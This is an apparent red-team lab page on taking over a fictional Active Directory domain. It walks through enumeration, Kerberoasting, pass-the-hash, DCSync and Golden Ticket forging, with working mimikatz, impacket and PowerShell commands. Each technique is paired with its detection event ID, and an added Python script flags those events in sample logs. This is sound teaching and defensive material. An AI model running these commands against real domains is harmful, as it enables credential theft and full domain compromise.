ACTIVE DIRECTORY ATTACKS
DOMAIN COMPROMISE — RED TEAM LAB
MODULE 08 — ENUM · KERBEROAST · PTH · DCSYNC · GOLDEN TICKET

OBJECTIVES

Enumerate domain users and groups
Identify the attack path to Domain Admin
Kerberoast — extract a service ticket
Crack the Kerberos ticket hash
Pass-the-Hash — authenticate as svc-sql
DCSync — dump domain hashes
Forge a Golden Ticket
Read the domain flag
MISSION BRIEF
PENTEST ENGAGEMENT — AUTHORISED
🔗 Peer lab — Network Security & IR path:
Active Directory Defence & Detection

DOMAIN: APEXCORP.LOCAL · DC: 10.10.18.10

SITUATION

You have compromised workstation WKSTN-014 and have credentials for low-privilege domain user j.porter (password: iloveyou). The goal is to escalate from this foothold to Domain Admin on the APEXCORP.LOCAL domain.

ENVIRONMENT

Object         Value
Domain         APEXCORP.LOCAL
DC             DC01 (10.10.18.10)
Current user   j.porter (Domain Users)
Workstation    WKSTN-014
Known creds    j.porter : iloveyou

ATTACK CHAIN

  • Phase 1 — Enumerate domain objects
  • Phase 2 — Find attack path via Attack Path viewer
  • Phase 3 — Kerberoast the svc-sql account
  • Phase 4 — Crack ticket → get plaintext password
  • Phase 5 — Pass-the-Hash to authenticate as svc-sql
  • Phase 6 — DCSync to dump all domain hashes
  • Phase 7 — Forge Golden Ticket with krbtgt hash
  • Phase 8 — Access DC and read flag

DETECTION NOTE

Each technique you use generates Windows Event Log entries visible in the Detection Log panel. This is what a SOC analyst would see. Check it after each phase — the peer lab covers defence of these exact events.

REFERENCE — AD ATTACKS
ENUMERATION
  net user /domain
  net group "Domain Admins" /domain
  Get-ADUser -Filter * -Properties *
  Get-ADGroupMember "Domain Admins"
  setspn -T APEXCORP -Q */*
KERBEROASTING
Request Kerberos service tickets for accounts that have SPNs. Each ticket is encrypted with a key derived from the service account's password, so the ticket can be cracked offline.
  Get-ADUser -Filter {ServicePrincipalName -ne "$null"}
  Invoke-Kerberoast -OutputFormat Hashcat | Out-File kerb.txt
Detection: Event ID 4769 — Kerberos Service Ticket requested with RC4 encryption (0x17)
PASS-THE-HASH
Use an NTLM hash to authenticate without knowing the plaintext password. Works against services that accept NTLM authentication.
  Invoke-TheHash -Type WMIExec -Target DC01 -Username svc-sql -Hash [NTLM]
  impacket-psexec -hashes :[NTLM] svc-sql@10.10.18.10
Detection: Event ID 4624 — Logon Type 3, NtLmSsp authentication package (no Kerberos)
DCSYNC
Mimics a Domain Controller replication request to extract password hashes for any domain account including krbtgt.
  Invoke-Mimikatz -Command '"lsadump::dcsync /domain:APEXCORP.LOCAL /user:krbtgt"'
  impacket-secretsdump -just-dc APEXCORP/svc-sql@10.10.18.10
Detection: Event ID 4662 — DS-Replication-Get-Changes-All right accessed on directory object
GOLDEN TICKET
Forge a Kerberos TGT using the krbtgt account hash. Grants access as any user to any service. Remains valid until the krbtgt password has been changed twice.
  Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:APEXCORP.LOCAL /sid:[SID] /krbtgt:[HASH] /ticket:golden.kirbi"'
  kerberos::ptt golden.kirbi
Detection: Event ID 4769 — ticket with anomalous lifetime or RC4 encryption for sensitive accounts. Microsoft ATA/Defender for Identity flags PAC anomalies and domain SID mismatches.
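The detection notes above, turned into a small SIEM-side triage script. This is an added example written for this page, not part of the lab's tooling; the events, the host WKSTN-014's address 10.10.18.44 and the second DC name DC02 are constructed, while the field names follow the Windows Security event schema. The Golden Ticket heuristics (anomalous lifetime, PAC anomalies) need ticket-level data that these fields do not carry, so they are not modelled.

```python
"""Apply the lab's detection rules (4769 RC4, 4624 NTLM, 4662 replication) to sample events."""

# Control access right GUID logged in 4662 when replication is requested.
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"  # DS-Replication-Get-Changes-All
RC4_HMAC = "0x17"  # TicketEncryptionType value for RC4-HMAC

# Constructed sample events (assumption: not captures from a live domain).
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "j.porter@APEXCORP.LOCAL",
     "ServiceName": "svc-sql", "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.10.18.44"},
    {"EventID": 4769, "TargetUserName": "j.porter@APEXCORP.LOCAL",
     "ServiceName": "DC01$", "TicketEncryptionType": "0x12", "IpAddress": "10.10.18.44"},
    {"EventID": 4624, "TargetUserName": "svc-sql", "LogonType": "3",
     "LogonProcessName": "NtLmSsp", "AuthenticationPackageName": "NTLM",
     "WorkstationName": "WKSTN-014", "IpAddress": "10.10.18.44"},
    {"EventID": 4662, "SubjectUserName": "svc-sql", "AccessMask": "0x100",
     "Properties": "%%7688 {" + DS_REPL_GET_CHANGES_ALL + "}"},
    {"EventID": 4662, "SubjectUserName": "DC02$", "AccessMask": "0x100",
     "Properties": "%%7688 {" + DS_REPL_GET_CHANGES_ALL + "}"},
]


def classify(event):
    """Return (technique, reason) when an event matches a lab detection rule, else None."""
    eid = event.get("EventID")
    if eid == 4769:
        svc = event.get("ServiceName", "")
        # RC4 service tickets for a user SPN are the Kerberoast signal; machine
        # accounts ($) and krbtgt are skipped to cut noise from AES-capable hosts.
        if event.get("TicketEncryptionType") == RC4_HMAC and not svc.endswith("$") and svc != "krbtgt":
            return ("Kerberoasting", f"RC4 TGS for SPN {svc} requested by {event.get('TargetUserName')}")
    elif eid == 4624:
        # Network logon via NtLmSsp where Kerberos was expected: pass-the-hash candidate.
        if event.get("LogonType") == "3" and event.get("LogonProcessName") == "NtLmSsp":
            return ("Pass-the-Hash candidate",
                    f"NTLM network logon as {event.get('TargetUserName')} from {event.get('WorkstationName')}")
    elif eid == 4662:
        subj = event.get("SubjectUserName", "")
        # Replication rights are normal for DC computer accounts; in production compare
        # against the real DC list rather than the "$" suffix used here for brevity.
        if DS_REPL_GET_CHANGES_ALL in event.get("Properties", "") and not subj.endswith("$"):
            return ("DCSync", f"{subj} exercised DS-Replication-Get-Changes-All")
    return None


def scan(events):
    """Run every event through classify() and return the matches in order."""
    return [hit for hit in (classify(e) for e in events) if hit]


if __name__ == "__main__":
    for technique, reason in scan(SAMPLE_EVENTS):
        print(f"[{technique}] {reason}")
```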
DOMAIN SID
  Get-ADDomain | Select-Object DomainSID
  whoami /user
DOMAIN FLAG

After forging a Golden Ticket, access \\DC01\C$\flag.txt to retrieve the flag.